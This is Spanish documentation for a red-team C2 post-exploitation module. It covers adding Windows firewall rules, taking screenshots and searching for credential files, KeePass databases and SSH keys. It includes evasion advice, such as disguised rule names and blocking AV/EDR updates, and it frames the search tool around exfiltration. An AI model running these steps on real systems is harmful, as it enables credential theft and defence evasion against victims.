Postex-BOF proporciona utilidades para operaciones de post-explotación: manipulación del firewall, captura de pantalla y búsqueda avanzada de archivos sensibles en el sistema comprometido.

Agentes compatibles: Beacon, Gopher, Kharon | Plataforma: Windows


firewallrule add

Agrega una regla al Firewall de Windows. Permite abrir puertos, autorizar tráfico o bloquear conexiones específicas.

firewallrule add --name <nombre> --port <puerto> [--protocol <proto>] [--direction <dir>] [--action <accion>]
ArgumentoRequeridoDescripción
--nameSiNombre descriptivo de la regla
--portSiPuerto o rango de puertos
--protocolNoProtocolo: tcp (por defecto) o udp
--directionNoDirección: in (por defecto) o out
--actionNoAcción: allow (por defecto) o block

Ejemplos:

# Abrir el puerto 9000 TCP para un listener bind TCP
firewallrule add --name "Windows Update Service" --port 9000 --protocol tcp --direction in --action allow

# Abrir un puerto UDP para DNS personalizado
firewallrule add --name "DNS Helper" --port 5353 --protocol udp --direction in --action allow

# Bloquear tráfico saliente a un rango de puertos
firewallrule add --name "Security Update" --port 8080 --direction out --action block

Situaciones de uso:

  • Antes de desplegar un agente BeaconTCP (bind), abrir el puerto en el firewall para que el servidor pueda conectarse.
  • Crear reglas de firewall que permitan el tráfico de comunicación del C2.
  • Bloquear tráfico saliente hacia servidores de actualización de AV/EDR para evitar que descarguen nuevas firmas.

Nota sobre OPSEC: Usa nombres de regla que parezcan legítimos del sistema para evitar detección durante auditorías de firewall. Recuerda eliminar las reglas después de la operación.


screenshot_bof

Captura una captura de pantalla del escritorio actual del usuario.

screenshot_bof

No requiere argumentos. Captura toda la pantalla y devuelve la imagen al operador.

Ejemplos:

# Tomar una captura de pantalla
screenshot_bof

Situaciones de uso:

  • Reconocimiento visual de la actividad del usuario en tiempo real.
  • Documentar evidencia durante un engagement de red team.
  • Verificar qué aplicaciones está usando el usuario (gestores de contraseñas, VPNs, etc.).
  • Confirmar que un usuario privilegiado está activo antes de intentar robo de credenciales.

sauroneye

Herramienta avanzada de búsqueda de archivos. Permite buscar archivos por extensión, nombre, contenido, tamaño y fecha de modificación. Extremadamente útil para localizar documentos sensibles, bases de datos de contraseñas, claves SSH y archivos de configuración.

sauroneye <ruta> [opciones]
ArgumentoRequeridoDescripción
pathSiDirectorio base de búsqueda
--extNoExtensiones de archivo separadas por comas (ej: docx,xlsx,pdf)
--keywordsNoPalabras clave para buscar en nombres de archivo, separadas por comas
--contentNoPalabras clave para buscar dentro del contenido de los archivos
--maxsizeNoTamaño máximo de archivo en bytes
--minsizeNoTamaño mínimo de archivo en bytes
--modified-afterNoArchivos modificados después de una fecha
--modified-beforeNoArchivos modificados antes de una fecha
--subdirsNoBuscar recursivamente en subdirectorios

Ejemplos:

# Buscar documentos Office y PDF en el escritorio del usuario
sauroneye C:\Users\admin\Desktop --ext docx,xlsx,pptx,pdf --subdirs

# Buscar archivos con "password" o "credential" en el nombre
sauroneye C:\Users --keywords password,credential,contraseña,clave --subdirs

# Buscar archivos de configuración con contraseñas en su contenido
sauroneye C:\inetpub --ext config,xml,json,ini --content password,connectionstring,apikey --subdirs

# Buscar bases de datos de KeePass
sauroneye C:\Users --ext kdbx,kdb --subdirs

# Buscar claves SSH y certificados
sauroneye C:\Users --ext pem,ppk,key,pfx,p12 --subdirs

# Buscar archivos recientes y grandes (posibles dumps o exports)
sauroneye C:\Users --minsize 1048576 --modified-after 2026-09-01 --subdirs

# Buscar scripts con credenciales hardcodeadas
sauroneye C:\Scripts --ext ps1,bat,cmd,vbs --content password,passwd,secret --subdirs

Situaciones de uso:

  • Recolección de credenciales: Buscar archivos con contraseñas almacenadas (configs, scripts, notas).
  • Exfiltración de datos: Localizar documentos sensibles antes de la extracción.
  • Búsqueda de claves: Encontrar claves SSH, certificados PFX, archivos KeePass.
  • Reconocimiento: Entender qué tipo de trabajo realiza el usuario comprometido.
  • Auditoría de seguridad: Verificar si hay información sensible expuesta en ubicaciones accesibles.

Advertencia: La opción --content (búsqueda dentro de archivos) es muy lenta en directorios grandes ya que lee el contenido de cada archivo que coincide con los filtros. Usa filtros de extensión y tamaño para limitar el alcance.


Flujo de trabajo recomendado

  1. Usa screenshot_bof para obtener una visión general de la actividad del usuario.
  2. Usa sauroneye con --ext y --keywords para localizar archivos sensibles rápidamente.
  3. Si necesitas abrir puertos para desplegar listeners adicionales, usa firewallrule add.
  4. Para búsquedas más profundas, agrega --content con filtros restrictivos de extensión y tamaño.